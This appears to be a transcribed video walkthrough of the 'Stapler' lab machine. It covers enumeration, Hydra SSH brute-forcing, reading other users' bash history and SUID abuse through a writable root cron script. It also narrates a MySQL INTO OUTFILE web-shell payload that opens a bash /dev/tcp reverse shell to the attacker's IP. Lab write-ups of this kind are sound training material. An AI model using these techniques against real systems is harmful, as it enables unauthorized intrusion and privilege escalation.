Yo, what is going on, guys? It is Henry here, back at it again with another little walkthrough video here. Today we're going to be doing Stapler, and I guess as I continue to speak, maybe we can snag this IP address on the box that's already spun up, and we'll talk about it afterwards. So, this is actually my second attempt at recording this video, because well, there's a lot to discuss about this box, as we'll see in probably just a few moments. One of which is, for whatever reason, whether it's an IP tables or a UFW firewall, it's not letting us scan like we normally would, so we have to tack a little -P_N onto this one. And while that's running, there is 2, maybe 3 different ways to get a shell onto this box. I'm going to do the one that I did the first time I was going through the machine. And then at the end of the machine, after we root it, I will point you in the direction of the other foothold. And then I suppose I'll just leave it up to you whether you want to explore that on your own. I definitely think you should, because it's super, super cool, and I learned something that way. But I'm gonna keep it. I'm gonna try to keep these videos a little short and not explore, I suppose, every single avenue. So this is a quote-unquote intermediate by author box, but hard by community. Ooh, and yeah, so I guess we'll kind of take a crack at it. So while this is going along, looks like we got 2 minutes left on that. We can just go ahead and guess and see if there's a website on port 80. And it looks like there's something on 80. What that thing is, not too sure yet. Not too familiar with this output, so not too sure what's going on here. Maybe there's something in like the network request. Any server types in the headers? No. Okay, no worries. While our Nmap scan's still finishing up, we can try to poke around for some manual things here. Maybe like a robots.txt. No robots.txt. Maybe like a sitemap.xml. I think that's what it's called, right? Nothing there. And then we could just try index.php. Maybe the site's not configured properly to display it. Nope, still nothing. And let's try .html here at the end. Still nothing. Let's pop back on over to Nmap. We certainly could start directory busting on this port, because we know it exists. But I kind of want to let this Nmap finish up right before we jump into that. Okay, Nmap just finished, and we have a handful of things back. Looks like 21, 23. Here, let's get a service scan and everything else running on this by tacking on a -A to our Nmap scan. And instead of every port, let's do 21, 22, 53, 80, 139, supposedly 666, 3306, and 12380. So we're going to go ahead and let that run. So it says FTP is open. So let's just give it a try. Let's try to anonymously connect to this. It says, Harry, make sure to update the banner when you get a chance to show who has access here. Let's try anonymous. Anonymous. Do a little ls. There's a note. We can get note. And if we go into this bottom terminal, do a quick little ls. Cat note. So we have 2 users, potentially, Harry and Ellie. Ellie, make sure you update the payload information. Leave it in your FTP account once you are done. John. So potentially 3 users at this point. Let's see what else we got going on. Supposedly DNS is running on it. We could probably enumerate that a little bit more. MySQL. Looks like our scan came back. Looks like Samba's running on the box. Let's take a look. So 53 is TCP wrapped, so maybe it's actually just a bait, and there's no DNS services running on here. FTP we just explored. SSH looks fine, nothing too crazy there. Never heard of this PHP CLI server 5.5. Maybe you could take a look at that. 666 is giving us a string out, and that's just 2 JPEG. Not too sure what's going on there. We have MySQL and potentially the ability to authenticate to it. And then looks like we have another web server on 12380. Okay. Cool. So let's just go ahead and see if we can truly connect to the MySQL server. So we're going to do MySQL-H, and then just still on my clipboard. Awesome. Host that. Let's try user of root, and then maybe like a -p. It's asking for a password. I'll just do root. So access denied for user that using password. So I got the wrong password, but it's possible to sign into MySQL remotely. So we'll just kind of squirrel that away into our notes and consider that going back to that later. We did see there was another website here on 12.380, so of course we would love to check that out. Let's do a little colon paste, and it's a coming soon. Sorry guys, B-sides happened too quick. Didn't have time to finish the website. Try again next year. No worries. Nothing too crazy in the source code by looks of it. Looks like it's all static HTML and CSS. Of course, we can do it. Whoa, what's going on here? Message from the head of our day. So if you're looking at this, we want to hire you. Base 64 string. What's going on here? Change the image source. I never saw this on my first walkthrough. Let's snag it, I guess. Yeah. How does one? There we go. This is a little obnoxious, but we'll make do. I just okay. Let's hop on over to a base 64 decode. This wasn't part of the script. All those slashes aren't an issue, but let's see. Alright, yeah, we'll just scrap this. I don't know what's going on here, but I don't think we need it. So we'll just continue on our way. And of course, we can start a directory bust here. So we're going to go ahead. I'm going to use FF. At least that's how I'm going to pronounce it. We're going to go over to word list. Dirbuster directory list 2.3. We're to do small.txt. Our fuzz word will be fuzz, HTTP, and the IP is right there, 192.168.49 and 61. And let's try on this higher port, 12.380. And we're going to say output file, let's say format into HTML, file name, default scan 1.html, and then let's do PHP extensions and .txt extensions. And it looks like I have a typo up top. I did 182 instead of 192. And I think this will be fine. Maybe we can, just for giggles, tack on a -c for color. Looks like it didn't like something. Oh, forgot to put the fuzz word at the end of the URL. Let's do that real quick. Fuzz. Lots of errors back. What did I do wrong? 12.380. Did I not put that in right? 192.1. Oh, that would be why. I read the wrong IP. That's all right. We fix this. We fix it live. We fix it live. 192.168, and it is not 49, but 61.148. Bang. All right, looking better, but still god-awfully slow. We'll let it do its thing. In the meantime, we can enumerate some of these other ports. We see we had Samba on. So what we could do is we could run a little enum for Linux against it. And I don't think it's going to be an issue running this against it, while we're also directory busting, considering only 4 to 10 requests are going per second. So let's see, 192.168.61, 148, not 149. And let's just let this run and see kind of like what it comes back with. All right, looks like we're going to be enumerating some users here. And maybe it'll come back with something. Looks like we have a nobody user, some unknowns. We'll let this finish up and hopefully have something a little bit better to work with. Alrighty, looks like we have finally some users being enumerated here. Looks like it tried a different SID here, and we're having a little bit better luck. The downside to this is there are plenty of users here. So unless we know of some that exist already, which we might have from those notes from earlier. This could be a little tough to just kind of, well, I guess brute force if we want to try, because SSH is on here. But maybe we can get a little creative or maybe a little lucky. But while those are going through all the users, we can stop this directory bust over here, and maybe we can toss it onto port 80 just to say that we tried all the HTTP ports. So we're going to go ahead and we're going to call this, truthfully, this one should have been default scan 1, but we'll call this default scan 2. We'll call this, we'll call it 80 scan for port 80. And while the requests on this one are going through much, much faster, well, we're still not really getting any hits back. We're doing PHP, TXT, probably could search for HTML as well. But what we can do is while this finishes up, we can take this list of users here. We can go ahead, copy that. We can say vim users.txt. Let's slap them all into here. And then I guess we get a little creative once this is finished up. Looks like some more built-in accounts, but these look like groups rather than users. So if we cat users.txt, there's all our users. But if we pipe that to cut with a delimiter of backslash, and we take the second field, and we pipe that back into cut, and we do D, and we cut on spaces, and we take field 1, and we pipe that out to user list. Oops, let me get everything lowercase. User underscore list.txt, and we cat user underscore list.txt. Looks like outside of some white spaces, looks like we have a list of users here. So that was a nice way to clean up that file. And it also looks like Enum for Linux just finished. So let's take a look at this list real quick. And I want to go to the end. Just get rid of this white space. Right, quit. Awesome. And let's clear this up. Let's pat back over. Nothing really crazy that was in this output. I mean, there's a couple shares here. There's a Kathy and a temp. So I guess we could check that out right now. We could do SMB client, and we can do ////192.168.61.148, and let's check out Kathy. And there is anonymous login, and let's see, we have Kathy stuff. It'll be CD into Kathy stuff. We'll do a little ls. There's a to-do list. We'll say get to-do list. Awesome. We'll go back. We'll pop back into backup. Do a quick little ls. There is a VS50p conf here, so we'll get that. And it looks like it's just a default WordPress 4 tarball here. And I guess it's gun zipped as well. So we're going to try to get it. Let's see. And then we're going to exit. Do a quick little ls. We can cat onto the VSFTP. And from when I looked at it before, I could be wrong, but everything seemed pretty regular here. There wasn't really any special settings, at least not that popped out to me. Maybe you would see something else, but nothing too nuts from what I've seen. So we're just going to ignore that. And then, let's see, I believe it was like the WordPress file, right? Yeah, I think if we, what is it, tar xf? Does this extract with tar, or do I gotta Google it? CD WordPress ls-all. Looks like there's no actual WP config, which would have been really important to have because we have remote sign-in into the SQL database. But since we still don't have a password, we're still kind of SOL on that. So we're going to CD out of here. We're going to clear this up real quick. And I guess we can clear up this main terminal as well. We did have to check out the temp directory. That was another directory that we saw from the SMB client output. Do a quick little ls, and doesn't appear to be anything here. And we don't really know where this directory is. Although if it is default, maybe we can find it in the VSFTPD configuration. But in the meantime, we can do a little exit. And we can take a look at this user list. And we can start a little brute force. We can definitely use Hydra. So if we do, oops, if I type properly, that would help. Hydra -L. And we're going to pass it that list of usernames. And we could run a word list like Rock U against it right now, but that would take absolute ages in order to finish. So we're just gonna kind of take a hope and a prayer that one of the usernames is a password. So we're gonna also specify all the usernames as potential passwords as well. And we're gonna specify SSH, and then we're gonna do // 192.168.61.148. We're going to attach a -v onto it so we can see it as it's trying attempts, and then dash under U to rotate through usernames. This will be important because, well, it won't run through all the passwords of a single user. You'll see. So let's just get this spun up and going. So for every single password, it's trying all the usernames before it moves on to the next password, basically. And with a short list like that, it's probably preferable. Even if you made a custom word list of between like 20 and 30 passwords and you're trying to brute force something, more than likely rotating around username would be important. Although anything that has a lockout policy, I mean, obviously keep that in mind because this would most definitely lock some of these users out. There's a lot of requests to get sent through if there was a lockout policy. So anyways, we're gonna let this run. Hopefully we maybe get something back on it. Oh, looks like we just got a hit with S Hazlet. So we're gonna go ahead and copy this, and we'll make a little creds.txt. Toss this bad boy in there. Username, password. I'm just gonna let this. We can cancel this out because we don't need that anymore. It's not come back with literally anything. So let's see if this actually works. SSH S Hazlet at 192.168.61.148. We say yes. This is Barry. Don't forget to put a message here. Maybe another username. And we are S Hazlet. And that is what we need for now. So now it's time for a little Privesc. 4.4, not too sure about that. We could definitely check something out, and we do a lot of manual enumeration just in general. At least I would like to. But I'm feeling a little lazy, and I kind of want to get limpies on this box and see what limpies shows us. So we're gonna go ahead and do a little Python 3 m http.server. Cool. And then what is our IP address? 4961. So do we have wget on the box? We do. So we have to do wget 192.168.49.61 on port 8000. And we get linpeas.sh. And we change mode plus X onto linpeas. And we run linpeas. And we see that sweet, beautiful P look right back at us. Hopefully, we will get some information from it. So we're going to cancel that Python server there. We don't need that quite anymore. Limpy says that it also doesn't like the system version. So maybe we explore, maybe a kernel exploit's out there that we can take advantage of. Sudo version doesn't like that, but that's not a guarantee. Let's see, we have GCC on the box, so if we do need to do that kernel exploit, we can compile it just fine. Let's see what else we got going on here. Keep scrolling through all this output. Oh, here we are. A little incident response moment. If you're looking at the process trees, you can see that maybe this is maybe this is malicious. Let's keep on scrolling. Don't know what this authbind stuff is. Let's keep scrolling. Nothing crazy in cron. We'll keep scrolling. Still not seeing anything too nuts. 25 listening locally. Okay. No big deal. Let's see what users have potential shells. So this Peter user, he's a member of the sudo group. Obviously root is root. Peter user has a lot of permissions. Good to know. Syslog has this Adam. Okay. And let's keep scrolling here. 422, we can SSH in. Something about a Kerberos conf file. Let's see, let's keep scrolling. A lot of stuff to go through. Any suids? Nothing that is jumping out. No GUIDs. Capabilities on the... Oh, hang on. You can write the script, use your local sbin cron logrotate.sh. This sounds pretty cool. We're definitely going to take a crack at that in just a second. Looks like we're almost at the end of our limpy's output here. Looks like we can read a lot of bash history. Maybe. I don't know if we actually can read these. Maybe we can give it a try in a second. And okay. Scrolling, some useful files. Okay. Let's check out that that var. I'm sorry, the sbin cron log rotate rather. Let's whoops, clear, and let's head on over to user local sbin. I think it was cron log rotate, yeah. Just here, and then let's do vim cron. Oops, not corn. Cron rotate. It says, Simon, you really need to do something about this. Let's check the permissions on this. So it's owned by root, and we can write to it. And I think it executes things as root. So maybe we test that hypothesis real quick. What if we went ahead and did vim, got rid of this comment, and what if we did, let's see if it runs as root. We can set a sticky bit rather, on bash. Maybe get a shell this way. Let's see, do this. I don't think I need this. Yeah, U+S. That looks better. Let's right quit to that. And lsr bin bash. Okay. Now, I think cron log rotate runs every 5 minutes or so. So while we kind of like wait for that to happen, let's go back on over to temp. Actually, let's head on over to home, and let's see if we can read any of those bash histories we saw from earlier, because there is most certainly. Let's still check. There's most certainly a lot of users here. Let's do cat all, and then let's see, /.bash history, something like this. Bash history. And I think this will work. Maybe it won't work. Do I have to specify? Oh, I misspelled history. History. Okay. Free exit. Who did this? So apt install. So password for Peter, which we saw as a pseudo user, is potentially this. Okay, we can give that a try in just a few seconds. Let's take a quick history at Take a look at bin bash. Still nothing crazy on that one, so maybe we'll give that one another couple minutes. Let's check out this. Let's check out this Peter path here. Let's see if this password is actually for Peter. We're gonna do a little switch user to Peter, and we'll paste that password in. ID. Okay, so we're Peter now, and I guess important takeaway there: always check bash history if you can read to it, because well, apparently we can. Apparently we read from everybody's if they had it, except Peter's history. So I wonder, we could track down who this came from in a second, but as we saw earlier from the limpy's output, Peter's a member of the sudo group, so we should just be able to sudo su and paste that password in one more time, and I think we're root. Yeah, look at that. All right. Very, very cool. Very, very cool. But let's say we didn't get into that bash history. What else could we have done? So we're still waiting on that cron log rotate to run. I think we can double check on it here. Yeah, we're still waiting on that to run. I think we got 2 minutes on that. So this is So that was one potential Privesc on this bash history. But if you enumerated a little bit better, and maybe you caught this when I was enumerating web directories, important thing I learned on this box is to always check both HTTPS and HTTP, because I think we're going to get some different results here. We'll call this the 12380 scan 2, and instead of HTTP, I think if we put HTTPS, I think we get some matches. Yeah, we actually get some matches on this. So we get a whole bunch of other things to enumerate, and this is one of those things where I kind of want to leave it up to you guys to kind of check out, see what's going on, because there definitely is a other pathway here through enumerating this website a little bit better, as well as whatchamacallit, getting in through MySQL. So if we check bin bash real quick, I think we still have a minute till it runs. If we head on over to var ww, through your enumeration and HTTPS, because that's what we needed the whole time, there's something called blog. And if you head on over to blog, I think you'll have some better luck finding something along the lines of a MySQL password. So since we have a shell in the box, just for giggles, we could take a look at this SQL password. And what we could have done while we're waiting on that cron log rotate to run, because I think it's every 5 minutes, it could be 15, but I think it's every 5. What we could have done was we could have MySQL as the user root. We could have guessed that user or enumerated it. And with this MySQL shell, there's actually potential for us to have gotten a shell. So because we were looking around in the command line, we see that the path is https blog. So if we gone over onto here and we do blog, I think it's just blog. Or is it blog/blog? I think it's blog/blog. 12380, and then of course HTTPS, because that was the problem in the first place, right? So HTTPS, this blog looks like it's hanging a little bit. Probably because we're slamming it right now. Yep. So if we accept the risk and continue, what if we just do blog? Okay, there we go. Okay. So there was something like this, so we could have poked around, things are great, but we know it's on /blog. And because we have this MySQL shell, like I mentioned, there is a way for us to get a shell initially onto the box. So if we do show databases, we use WordPress, and if we select all from, I think, WP users, a lot of hashes, good to know, but that's not exactly what I was looking for. I think we just have to be here. I think this will do just fine. If we do something along the lines of select, and then we do quote this PHP exec, and then we do one of these, I think, in bash c bash. So we're just getting a reverse shell here. If we can write to a file, dev TCP 192.168.49. I'm gonna go ahead and peek my IP real quick. 4961. So if we go back here, 4961, and let's have it come back on port 443, and we put it out to this one /parentheses, boom, semicolon, boom, and this. And we say into out file. And then typically files are held in the var www for web. We know this was HTTPS because we already have a shell on the box. We can say blog. And we can say WP content because we know it's a WordPress site, WP content. And we could do uploads, test.php, and that with a semicolon. And if all goes well, and I think I typed everything in just fine. If all goes well, it says query OK, one row affected. What I'm going to do is I'm going to cancel this directory bus. I'll leave the enumeration for you folks watching the video. And if we do netcat lvnp 443, so a netcat listener listening for that shell to potentially come back from, and we saw that we put it at wp content uploads that test.php. So if we go to the IP blog, and we go to wp content uploads, whoops, that was meant to be this, uploads test.php, hopefully this will hang. And because it is hanging, I think we might have gotten a shell callback. We didn't. WP content uploads 4961.443. So what is going on here? HTTPS, this, blog, WP content, uploads / test.php. Is it just taking a while to come back? Or did I mistype something? Let's see. Let's take a look at it real quick. Select PHP exec. And this bin bash -c bash -i dev tcp my IP address 443 greater than and symbols 1 bang into out file var www https blog wp content uploads test.php. Looks good to me. Maybe I just broke it. I'm not too sure. Okay, we can we can see the file in uploads, and we click on it. We're just not getting a callback. 49.161, 49.61, 49.61. Looks like we had a little bit of a typo. Let's run this back, and maybe we can still fix it. And instead of 169, let's do 168. Already exists. We'll call this the test2.php. Pop back on over to this uploads folder, refresh it, test2.php, and there's our shell. There was our other way to get the shell. Alright, maybe that was not clean, but we did it anyways, so we'll count that as a net victory. And we could have explored the same Privesc patterns that we did before, but this was just a different way to get that initial shell. And by now, I think if we ls on bin bash, I think it'll be, yep, it'll be a little different. I meant to do a ls-al, do one of these. And the sticky bit has been set onto bin bash from the user local sbin cron logrotate.sh that we wrote to. So very, very cool. And so now if we just go to bin bash and we do a little -p, we have an effective user ID of root. So I know that was a little all over the place, and there was a lot of things that came up, and well, you know, you watched the video, you know. But I hope you learned something cool. I really liked this this SQL portion. I don't often run into boxes where you have to write to files like this, or maybe it's not a path that I commonly take. Also, it kind of taught me to check out my enumeration a little bit better and make sure to check both HTTP and HTTPS. So kind of some food for thought there. Yeah, so I hope you learned something on this box. That's probably where I'm going to call it. I think there's a little bit more for you to enumerate if you wanted to do something like this on your own, but we'll call it there. Thanks for watching another video, another walkthrough that I've done, and I'll catch you in the next one.